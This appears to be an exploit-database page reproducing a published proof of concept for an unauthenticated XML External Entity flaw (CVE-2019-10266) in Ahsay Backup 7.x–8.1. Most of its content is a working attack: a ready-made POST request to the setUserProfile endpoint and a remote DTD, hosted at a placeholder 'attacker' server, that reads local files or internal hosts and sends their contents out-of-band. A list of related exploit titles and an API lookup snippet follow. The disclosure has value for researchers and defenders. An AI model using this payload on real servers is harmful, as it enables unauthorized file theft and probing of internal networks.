Menu

Search for hundreds of thousands of exploits

"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection"

Author

"Wietse Boonstra"

Platform

jsp

Release date

2019-07-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# Unauthenticated XML External Entity (XXE) in Ahsay Backup v7.x - v8.1.0.50. 
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe
# Version: 7.x < 8.1.0.50
# Tested on: Windows / Linux
# CVE : CVE-2019-10266

#Ahsay is vulnerable to a OOB Unauthenticated XML External Entity
#More info https://www.wbsec.nl/ahsay/#CVE-2019-10263

Sending the following POST request will trigger the XXE:

POST /obs/obm8/user/setUserProfile HTTP/1.1
Content-Type: application/octet-stream
Content-Length: 126
Host: 172.16.238.213:80
        
<?xml version="1.0"?>
 <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker/oob"> %remote;%intern; %trick;]>

On http://attacker/oob add the following content:

<!ENTITY % payl SYSTEM "file:///c:/"><!ENTITY % intern "<!ENTITY &#37;
        trick SYSTEM 'file://:%payl;/%payl;'>">

Here it is possible to change file:///c:/ to any directory/file or internal host.
Release Date Title Type Platform Author
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47181/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47181/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47181/41561/ahsay-backup-7x-81150-xml-external-entity-injection/download/", "exploit_id": "47181", "exploit_description": "\"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection\"", "exploit_date": "2019-07-26", "exploit_author": "\"Wietse Boonstra\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse